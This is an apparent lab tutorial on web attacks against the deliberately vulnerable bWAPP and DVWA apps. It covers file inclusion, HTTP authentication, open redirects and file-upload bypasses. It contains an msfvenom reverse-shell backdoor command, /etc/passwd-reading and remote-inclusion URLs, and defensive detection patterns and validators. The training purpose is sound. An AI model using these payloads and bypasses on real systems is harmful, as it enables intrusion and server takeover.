
LOCAL & REMOTE FILE INCLUSION


With the include() function, a developer can insert the content of one PHP file into another PHP file before the server executes it. The function is typically used to pull in shared functions, headers, footers or other elements that are reused on multiple pages.



This helps developers change the layout of a complete website with minimal effort: if a change is required, only the included file needs to be edited instead of thousands of files.



The require() statement is also used to include a file into the PHP code. There is, however, a big difference between include and require: when a file is included with the include statement and PHP cannot find it, the script continues to execute.



With the require statement, the script will not continue if the file is not available; PHP raises a fatal error instead.



The require_once() function includes the called file only once, even if the statement is reached again. The only difference between require and require_once is that, if PHP finds the file has already been included, the calling script ignores any further inclusion of it.



Note: allow_url_include is disabled by default. If allow_url_fopen is disabled, allow_url_include is also disabled.



File Inclusion Attacks:

A file inclusion attack allows an attacker to include a file on the web server through a PHP script. The vulnerability arises when a web application lets client-supplied input decide which file is included, or lets clients upload files to the server.



There are two types of file inclusion attack:

a) Local File Inclusion

b) Remote File Inclusion



Basic Local File Inclusion:

An LFI vulnerability allows the user to include a file on the server by changing a URL parameter in the browser.

In this article I have used two different platforms, bWAPP and DVWA, which both contain a file inclusion vulnerability.

Below is the file which we are going to attack,

                         {Please look image 01}

Before we select the “English” language, the URL is http://192.168.93.156/bwapp/bWAPP/rlfi.php

After selecting the language, the URL is http://192.168.93.156/bwapp/bWAPP/rlfi.php?language=lang_en.php&action=go

We can see the change: the selected language file is passed as a parameter in the URL. I will change the path to a different file to check whether it is vulnerable.



When I change the file path to the one below,

http://192.168.93.156/bwapp/bWAPP/rlfi.php?language=../../index.html

                         {Please look image 02}

                         {Please look image 03}

Null Byte:



After raising the security level, the same file path no longer works.

                         {Please look image 04}

With the help of Burpsuite – Interceptor, we captured the request and forwarded it to Burpsuite – Repeater.

                         {Please look image 05}

By adding a “null character” at the end of the file name, it worked as expected.

Base64 Encoded:



There is another way to exploit LFI when the security level is high. Below is the URL that uses the PHP filter wrapper,

http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

                          {Please look image 06}

Below is the base64 encoded value of /etc/passwd,

We decoded the above value with the help of Burpsuite – Decoder,

We can also use HackBar, a Firefox plugin, to decode the above base64 value,

                          {Please look image 07}

PHP Input:



Using the PHP input wrapper we will execute injected PHP code to exploit the LFI vulnerability. We will perform this task with the help of “hackbar”.

                          {Please look image 08}

Manipulate the value inside the HackBar tool.



                          {Please look image 09}

                          {Please look image 10}

Proc/Self/Environ:



If the server is outdated on patching, it may be exploitable through LFI.

/proc/self/environ is a file that exposes the process environment, which includes the User-Agent details. We will use this file to store our PHP code for executing CMD commands.

                          {Please look image 11}

Remote File Inclusion:



Remote file inclusion occurs when the URL of a file located on a different server is passed as a parameter to one of the PHP functions include, include_once, require or require_once. PHP incorporates the content into the page, and if the content happens to be PHP source code, PHP executes it.

                          {Please look image 12}

                          {Please look image 13}
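Seen from the defender's side, every request shape used in the exercises above (traversal, null byte, php:// wrapper, /proc/self/environ, remote URL) can be flagged in the web server's access log. The following is an added example, not code from the original post; the log lines are constructed to mirror the bWAPP requests, and the attacker host name is a placeholder.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (not real traffic) modelled on the bWAPP
# requests shown above; the null byte appears in its %00 URL-encoded form.
SAMPLE_LOG = """\
192.168.93.1 - - [01/Jan/2024:10:00:01 +0000] "GET /bwapp/bWAPP/rlfi.php?language=lang_en.php&action=go HTTP/1.1" 200 512
192.168.93.1 - - [01/Jan/2024:10:00:02 +0000] "GET /bwapp/bWAPP/rlfi.php?language=../../index.html HTTP/1.1" 200 512
192.168.93.1 - - [01/Jan/2024:10:00:03 +0000] "GET /bwapp/bWAPP/rlfi.php?language=../../../etc/passwd%00&action=go HTTP/1.1" 200 512
192.168.93.1 - - [01/Jan/2024:10:00:04 +0000] "GET /bwapp/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 512
192.168.93.1 - - [01/Jan/2024:10:00:05 +0000] "GET /bwapp/bWAPP/rlfi.php?language=%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 512
192.168.93.1 - - [01/Jan/2024:10:00:06 +0000] "GET /bwapp/bWAPP/rlfi.php?language=http://attacker.example/shell.txt HTTP/1.1" 200 512
192.168.93.1 - - [01/Jan/2024:10:00:07 +0000] "GET /bwapp/bWAPP/rlfi.php?language=lang_fr.php&action=go HTTP/1.1" 200 512
"""

# Indicators, each matched against the fully decoded parameter value.
LFI_INDICATORS = [
    ("traversal",    re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("php_wrapper",  re.compile(r"^php://", re.IGNORECASE)),
    ("remote_url",   re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)),
    ("proc_environ", re.compile(r"/proc/self/environ", re.IGNORECASE)),
]

REQUEST_RX = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_fully(value, max_rounds=5):
    """Percent-decode until the value stops changing, so multi-level encoding is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value):
    """Return the list of indicator names that fire on one parameter value."""
    value = decode_fully(value)
    hits = [name for name, rx in LFI_INDICATORS if rx.search(value)]
    if "\x00" in value:          # %00 truncation trick from the null-byte section
        hits.append("null_byte")
    return hits


def scan_log(text):
    """Return [(request_path, {param: [indicators]})] for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RX.search(line)
        if not m:
            continue
        path = m.group(1)
        flagged = {}
        for param, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                flagged[param] = hits
        if flagged:
            findings.append((path, flagged))
    return findings
```

A tight allow-list on the application side (only `lang_*.php` names, no paths) is the fix; the scanner above is for spotting attempts in logs, not a substitute for it.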

HTTP AUTHENTICATION


HTTP Protocol: 
HTTP (Hypertext Transfer Protocol) is basically a client-server protocol: the client makes a request to the server and the server responds to that request. The server's response is mostly in the form of HTML-formatted pages. HTTP uses port 80 by default, but the web server and the client can be configured to use a different port for the communication.

HTTP is a stateless protocol, which means the server does not retain information about each user. HTTP is the backbone of the World Wide Web (WWW), and being stateless simply means that it does not remember each client that connects; even if a single user sends multiple requests one after another, the server treats them all as independent requests.

The predecessors of HTTP 2 are HTTP 1.0 and 1.1, and the differences are:
HTTP 2 is binary, not textual
HTTP 2 is multiplexed: it can use a single connection for parallelism, whereas HTTP 1 is based on ordering and blocking
HTTP 2 compresses its headers to reduce overhead
HTTP 2 gives servers the capability to “push” responses to clients proactively

HTTP works through different methods, which are:
GET – Used to retrieve information from the given URL
POST – Used to send data to the server, e.g. customer information or a file upload, usually via HTML forms
DELETE – Deletes the file at the specified URL
PUT – Uploads a file to the specified URL
TRACE – A trace on the JSP resource returns the content of the resource
HEAD – Like GET, but returns only the HTTP headers and no document body
OPTIONS – Returns the HTTP methods that the server supports



The major differences between GET and POST are,



An HTTP client sends a request to the server in the form of a request message, which has the following format,



REQUEST:
Method: GET
Host: This header field identifies an individual website by hostname when several sites share the same IP address.
User-Agent: The client web browser sets a user-agent string to identify the type and version of the browser. The browser fills this field with default values, but the end user can spoof it.
Cookie: This field stores a temporary value shared between the client and server for session management.
Referer: This field contains the address of the previous web page from which a link to the current page was followed.
Accept-Encoding: This field defines the compression schemes supported by the client; gzip and deflate are the most common ones.

RESPONSE:
HTTP Version: The HTTP version the server supports
Date: The date and time at which the message originated
Set-Cookie: This field, if present, contains a random value that the server can use to identify the client and store temporary data.
Server: Displays information about the web server hosting the website
Content-Length: This field contains the number of bytes in the body of the response.





HTTP Authentication – Basic and Digest: 
HTTP authentication covers the methods by which web servers and browsers exchange credentials such as user names and passwords. The two schemes described here, Basic and Digest, follow predefined standards that use an encoding technique (Basic) and MD5 cryptographic hashing (Digest) over the HTTP protocol.


Basic Access Authentication using Base64 Encoding: 
In Basic authentication we use base64 encoding to generate the credential string, which contains the username and password. Note that we can use any other encoding technique, such as URL or hexadecimal encoding, in the same way.

The web page asks the client for input.
We have provided “hackingarticles” as the username and “ignite” as the password.

The syntax of basic authentication is,
Value = username:password
Encoded Value = base64(Value)
Authorization Value = Basic <Encoded Value>


Here, the encoded value of hackingarticles:ignite is aGFja2luZ2FydGljbGVzOmlnbml0ZQ==


With the help of Burpsuite – Proxy, we can capture the request, which carries exactly this Authorization value.


Digest Access Authentication: RFC 2069 

Digest Access Authentication uses hashing to generate the credential that is sent to the server.

The syntax of RFC 2069 is,
Hash1=MD5(username:realm:password)
Hash2=MD5(method:digestURI)
Response=MD5(Hash1:nonce:Hash2)

Hash1 → The MD5 hash of (username:realm:password), where realm is an arbitrary string provided by the server and username and password are the input provided by the client.

Hash2 → The MD5 hash of (method:digestURI), where method is GET or POST depending on the page request and digestURI is the URL of the page to which the request is being sent.

Response → The final string sent to the server: the MD5 hash of (Hash1:nonce:Hash2), where Hash1 and Hash2 are generated as above and nonce is an arbitrary string, provided by the server to the client, that is meant to be used only once.

RFC 2617 is an enhanced version of RFC 2069.


Digest Access Authentication: RFC 2617 
RFC 2617 digest authentication also uses the MD5 hashing algorithm, but the final hash value is generated with some additional parameters.

The syntax of RFC 2617 is,
Hash1=MD5(username:realm:password)
Hash2=MD5(method:digestURI)
Response=MD5(Hash1:nonce:nonceCount:cnonce:qop:Hash2)

Hash1 → The MD5 hash of (username:realm:password), where realm is an arbitrary string provided by the server and username and password are the input provided by the user on the client side.

Hash2 → The MD5 hash of (method:digestURI), where method is GET or POST depending on the page request and digestURI is the URL of the page to which the request is being forwarded.

Response → The final string sent to the server: the MD5 hash of (Hash1:nonce:nonceCount:cnonce:qop:Hash2), where Hash1 and Hash2 are generated in the steps above, nonceCount and cnonce are supplied by the client and qop is the quality-of-protection value chosen by the server.
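The three constructions above (Basic, Digest RFC 2069 and Digest RFC 2617) carried through in code, including the server-side check that needs only Hash1 rather than the password. This is an added example, not code from the original post; the realm, nonce, nonce count and cnonce values are constructed.

```python
import base64
import hashlib
import hmac


def md5_hex(s):
    """MD5 hex digest of a string, the primitive both RFCs build on."""
    return hashlib.md5(s.encode()).hexdigest()


def basic_header(username, password):
    """Basic auth: reversible base64 of 'username:password', sent on every request."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"


def decode_basic_header(header):
    """Inverse of basic_header, as a proxy or log reviewer would recover it."""
    scheme, _, token = header.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic Authorization header")
    user, _, pw = base64.b64decode(token).decode().partition(":")
    return user, pw


def digest_response_2069(username, realm, password, method, uri, nonce):
    """RFC 2069: Response = MD5(Hash1:nonce:Hash2)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def digest_response_2617(username, realm, password, method, uri,
                         nonce, nc, cnonce, qop="auth"):
    """RFC 2617: Response = MD5(Hash1:nonce:nonceCount:cnonce:qop:Hash2)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def verify_digest_2617(stored_ha1, method, uri, nonce, nc, cnonce,
                       response, qop="auth"):
    """Server side: the store holds Hash1 (bound to the realm), never the password.
    The comparison is constant-time so the check itself does not leak timing."""
    ha2 = md5_hex(f"{method}:{uri}")
    expected = md5_hex(f"{stored_ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return hmac.compare_digest(expected, response)
```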


URL REDIRECTION


01 Basic (Clear Text)
02 Encoding (Normal/Hex/Multilevel)
03 Base64
04 Hashing
05 Salt


A redirect automatically sends a website's visitors to a different location or URL. The destination may be another location within the same site or an entirely different site.

Unsafe redirects and forwards are the result of a web application accepting untrusted input that makes it redirect the request to a URL contained in that untrusted, unvalidated input. This type of redirection is also called unvalidated redirection.

** Basic Redirection:

The image below shows the redirection link (highlighted), which is in clear text (192.168.93.156/redirect/01-redirect/re.php?url=http://www.hackingarticles.in)

This page redirects to http://www.hackingarticles.in

This is a basic, simple redirection from one page to another through a PHP script, without taking any security measures into account.

** URL Encoding:

The image below shows the redirection link (highlighted), which is in clear text (192.168.93.156/redirect/02-hex/re.php?url=http://www.hackingarticles.in)


Here we are not changing the page we redirect to; instead we use simple URL encoding. We can send our URL in URL-encoded form, and the encoded URL is decoded by the script running on the redirect page (re.php in this case).

We can use any online or offline tool to calculate the URL-encoded value.
In this case we use http://www.meyerweb.com and Burpsuite – Decoder.


Below is the URL-encoded value of http://www.hackingarticles.in

192.168.93.156/redirect/02-hex/re.php?url=http://www.hackingarticles.in

We land on the same page if we use URL encoding,
192.168.93.156/redirect/02-hex/re.php?url=http%3A%2F%2Fwww.hackingarticles.in

** HEX Encoding:

Here we convert the redirection URL into its hexadecimal value using Burpsuite – Decoder.

The single hex-encoded value of http://www.hackingarticles.in is,
%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e

** Multilevel Encoding:

Multilevel encoding means re-encoding an already encoded value.


The double-encoded value of http://www.hackingarticles.in is
%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65%25%36%39%25%36%65

This also lands on the same page.

** Base 64 Encoded Redirection:

The image below shows the redirection link, which is base64 encoded.
http://192.168.93.156/redirect/03-base64/re.php?url=aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4%3D


If we want to redirect to a different site, for example http://google.com,

we change the redirection link from the base64 of http://www.hackingarticles.in to the base64 of http://google.com, as shown below,


http://192.168.93.156/redirect/03-base64/re.php?url=aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4%3D

to

http://192.168.93.156/redirect/03-base64/re.php?url=aHR0cDovL2dvb2dsZS5jb20=

The above link lands on http://google.com as expected.

** Redirection using Hash Values:

In this section we cover a more secure way of redirection using hashing techniques.

The image below shows the redirection link and the site


http://192.168.93.156/redirect/04-hashing/re.php?url=http://www.hackingarticles.in&hash=8258c1efb05943d059476150cb22df1d

We can see that the redirection link not only contains the redirection URL as a parameter but also a hash value generated with MD5, SHA1, SHA512 or any other hashing algorithm. The redirection only works if the combination of URL and hash value is correct; otherwise it fails.

For the sake of understanding, our redirection link shows the URL and hash parameters, but in real development developers will hide those details, so that an attacker cannot judge where the page is being redirected.

For this exercise we use the HashCalc hash calculator tool.

MD5 hash value of http://www.hackingarticles.in is 8258c1efb05943d059476150cb22df1d



For testing, we change the hash value from 8258c1efb05943d059476150cb22df1d to 9258c1efb05943d059476150cb22df1d


The screenshot above clearly shows that the URL and hash value do not match, and hence the redirection does not work.

** Redirection using Hash Values with Salting:

To increase the security of the redirection URL, we introduce salting. A salt is an extra value combined with the URL before hashing so that the redirect is harder to forge. The salt value can be any combination of characters, digits, alphanumerics, special characters or anything else we define.

The salt may be added at the front or the end of the URL, depending on the developer's choice.

In our example, below is the redirection URL with salting and hashing.
http://192.168.93.156/redirect/05-salt/re.php?url=http://www.hackingarticles.in&salt=black&hash=1c175b02baf8cf857523fdfe6c2d7645

When we click the redirect link, the redirection script on re.php takes the passed URL, generates its hash value (we are using the SHA1 hash algorithm) with the salt value (black) added to the URL, and compares the generated hash with the one we sent in the request. The link only takes us to the redirect page if both values match.

SHA1 hash value of http://www.hackingarticles.in{black} is 1c175b02baf8cf857523fdfe6c2d7645





If the values do not match, below is the output we get,

FILE UPLOAD

File upload vulnerabilities are a major problem in web-based applications. In many web servers the impact depends entirely on what the upload feature is for: it allows an attacker to upload a file containing malicious code that can then be executed on the server.

Basic file upload:
A simple PHP file is uploaded to the web server without any restrictions; here the server checks neither the Content-Type nor the file extension.

Set the DVWA security level to Low

                         {Please look image 01}

Create a PHP backdoor with the following command,
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=172.20.10.3 lport=4444 -f raw

                         {Please look image 02}

Save the output with a PHP extension as img.php

                         {Please look image 03}

                         {Please look image 04}

We have successfully uploaded a malicious PHP file, and the application told us the directory where the file is stored.

Before executing the uploaded malicious PHP file, we need to start a listener on the attacker machine with Metasploit,

                         {Please look image 05}


The malicious file has been uploaded to 192.168.93.156/dvwa/hackable/uploads/

                         {Please look image 06}

I got a meterpreter session when I opened the img.php file, which gave a reverse connection back to the attacker machine.

                         {Please look image 07}


Double Extension Injection Technique:

For this exercise we need to change the security level to medium.

                         {Please look image 08}

This time it did not allow me to upload the malicious PHP file; it says it only accepts JPEG or PNG images.

                         {Please look image 09}

To bypass this restriction, we hide the real nature of the file by giving the filename multiple extensions, which confuses the security checks.

Rename the existing malicious file from img.php to img.php.png

Set up the listener with Metasploit,

                         {Please look image 10}

Now we upload the double-extension file img.php.png

                         {Please look image 11}

Before uploading, we capture the request with Burpsuite – Interceptor, which lets us change the file extension and bypass the client-side checks.

Burpsuite – Interceptor captures the file upload request; we change the file extension before forwarding it to the server,

                         {Please look image 12}

                         {Please look image 13} 

                         {Please look image 14}

                         {Please look image 15}

The file has been uploaded successfully with the php extension.
We got a reverse connection when we opened the uploaded malicious file.

Null Byte Injection:
Null byte injection is an exploitation technique that adds URL-encoded null byte characters (i.e. %00, or 0x00 in hex) to user-supplied data. A null byte in the URL is represented by ‘%00’, which the ASCII view of the request shows as a blank space.
This injection can alter the intended logic of the application and allow a malicious adversary to gain unauthorized access.

The reason for inserting a null byte is that some application server scripting languages still use C/C++ libraries to check the filename and content. In C/C++ a string ends with \0, which is called the null byte.

Hence, when such a library reads a null byte in the string, it assumes it has reached the end of the string and stops reading any further.

Repeat the same process for creating a backdoor and an msfconsole listener. I have the double extension file img3.php.jpg.

We captured the request with the help of Burpsuite – Interceptor,

                         {Please look image 16}

Added a string at the end of the malicious file's extension, to be turned into a null byte,

                         {Please look image 17}

Image of the hex value,

                         {Please look image 18}

Changing it into a null byte,

                         {Please look image 19}

Reviewing the raw data again, the string is gone and only a blank space is shown in its place,

                         {Please look image 20}

                         {Please look image 21}

                         {Please look image 22}

The malicious file has been uploaded successfully.
With the listener started, we got a reverse connection when we opened the uploaded malicious file,

                         {Please look image 23}

Blacklisting File Extension:

For this exercise we use the bWAPP application with medium-level security.

                         {Please look image 24}

                         {Please look image 25}

When I tried uploading the malicious file img3.php, the php extension was blacklisted. To bypass this case-sensitive rule, we use an alternative form of the same extension, such as PhP or php3.

Filename: img3.php3

The file has been uploaded successfully.

                         {Please look image 26}

                         {Please look image 27}

                         {Please look image 28}

With the reverse TCP handler started, we got a reverse connection when we opened the uploaded malicious file.
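Each bypass in this post (double extension, null byte, case variants and php3 against a blacklist) defeats a check on the client-supplied name alone. An upload validator that survives all of them needs an extension allow-list, exactly one extension, a null-byte check, a content sniff against the declared type, and a server-chosen storage name. This is an added example, not code from the original post or from DVWA/bWAPP; the magic-byte table covers only JPEG and PNG.

```python
import os
import re
import secrets

# Allowed extensions and the magic bytes a genuine file of that type starts with.
ALLOWED_TYPES = {
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png":  b"\x89PNG\r\n\x1a\n",
}
STEM_RX = re.compile(r"[A-Za-z0-9_-]{1,64}")
PHP_TAGS = (b"<?php", b"<?=")


def validate_upload(filename, content):
    """Return (accepted, reason) for a candidate upload; every branch maps to a bypass above."""
    if "\x00" in filename:                       # img3.php.jpg%00 truncation
        return False, "null byte in filename"
    base = os.path.basename(filename.replace("\\", "/"))   # drop any directory part
    parts = base.split(".")
    if len(parts) != 2:                          # img.php.png, dotfiles, no extension
        return False, "exactly one extension required"
    stem, ext = parts
    ext = ext.lower()                            # PhP, PHP3 etc. are simply not on the list
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext!r} not allowed"
    if not STEM_RX.fullmatch(stem):
        return False, "unsafe characters in filename"
    if not content.startswith(ALLOWED_TYPES[ext]):   # declared type vs real bytes
        return False, "content does not match declared type"
    if any(tag in content for tag in PHP_TAGS):  # valid image header with PHP appended
        return False, "embedded PHP code"
    return True, "ok"


def storage_name(ext):
    """Never reuse the client's name: store under a random name with the verified extension."""
    return f"{secrets.token_hex(16)}.{ext.lower()}"
```

Serving the upload directory with script execution disabled (no PHP handler for that path) is the second half of the mitigation, so that a file that slips through the checks still cannot run.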